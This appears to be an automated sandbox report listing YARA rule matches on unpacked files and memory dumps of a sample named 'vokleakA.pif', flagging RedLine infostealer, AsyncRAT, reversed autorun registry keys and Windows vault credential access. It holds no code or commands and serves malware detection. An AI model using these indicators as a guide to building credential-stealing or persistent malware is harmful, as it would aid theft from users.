              Source: 7.2.vokleakA.pif.28550000.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 7.2.vokleakA.pif.28550000.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 4.1.vokleakA.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 9.2.vokleakA.pif.31b93fde.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 9.2.vokleakA.pif.31b93fde.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 9.2.vokleakA.pif.31b93fde.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 9.2.vokleakA.pif.34490000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 9.2.vokleakA.pif.34490000.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 9.2.vokleakA.pif.34490000.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 4.2.vokleakA.pif.31be3fde.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 4.2.vokleakA.pif.31be3fde.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 4.2.vokleakA.pif.31be3fde.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 9.2.vokleakA.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 4.2.vokleakA.pif.31e40ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 4.2.vokleakA.pif.31e40ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 4.2.vokleakA.pif.31e40ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 7.2.vokleakA.pif.284a0ee8.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 7.2.vokleakA.pif.284a0ee8.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 7.2.vokleakA.pif.284a0ee8.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 9.2.vokleakA.pif.32ef5570.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 9.2.vokleakA.pif.32ef5570.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 9.2.vokleakA.pif.32ef5570.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 7.1.vokleakA.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 7.2.vokleakA.pif.25de4ec6.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 7.2.vokleakA.pif.25de4ec6.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 7.2.vokleakA.pif.25de4ec6.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 4.2.vokleakA.pif.31be4ec6.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 7.2.vokleakA.pif.2701d590.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 4.2.vokleakA.pif.31be4ec6.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 4.2.vokleakA.pif.31be4ec6.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 7.2.vokleakA.pif.2701d590.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 7.2.vokleakA.pif.2701d590.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 9.3.vokleakA.pif.2ff3d950.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 9.3.vokleakA.pif.2ff3d950.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 9.3.vokleakA.pif.2ff3d950.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 9.2.vokleakA.pif.34af0000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 9.2.vokleakA.pif.34af0000.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 9.2.vokleakA.pif.34af0000.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 4.2.vokleakA.pif.3305d590.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 4.2.vokleakA.pif.3305d590.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 4.2.vokleakA.pif.3305d590.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 9.2.vokleakA.pif.32ef5570.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 9.2.vokleakA.pif.32ef5570.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 9.2.vokleakA.pif.32ef5570.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 4.2.vokleakA.pif.34c30000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 4.2.vokleakA.pif.34c30000.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 4.2.vokleakA.pif.34c30000.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 4.2.vokleakA.pif.31e40000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 4.2.vokleakA.pif.31e40000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 4.2.vokleakA.pif.31e40000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 9.2.vokleakA.pif.34af0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 9.2.vokleakA.pif.34af0000.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 9.2.vokleakA.pif.34af0000.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 9.2.vokleakA.pif.34490ee8.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 9.2.vokleakA.pif.34490ee8.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 9.2.vokleakA.pif.34490ee8.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 7.2.vokleakA.pif.25de3fde.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 7.2.vokleakA.pif.25de3fde.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 7.2.vokleakA.pif.25de3fde.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 7.2.vokleakA.pif.25de3fde.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 7.2.vokleakA.pif.25de3fde.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 7.2.vokleakA.pif.25de3fde.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 4.2.vokleakA.pif.33006458.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 4.2.vokleakA.pif.33006458.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 4.2.vokleakA.pif.33006458.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 00000004.00000001.2001615999.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000007.00000001.2149766444.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 00000009.00000002.2300614392.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000004.00000002.3232986846.000000003206C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000007.00000003.2152494125.000000002436F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 00000007.00000003.2152494125.000000002436F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 00000007.00000002.2218197846.0000000024381000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000004.00000002.3207967153.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000007.00000002.2218828433.0000000025DA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 00000007.00000002.2218828433.0000000025DA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 00000004.00000002.3234827189.0000000033005000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 00000004.00000002.3234827189.0000000033005000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 00000004.00000002.3231455103.0000000031BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 00000004.00000002.3231455103.0000000031BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 00000009.00000002.2319744626.0000000031B53000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 00000009.00000002.2319744626.0000000031B53000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
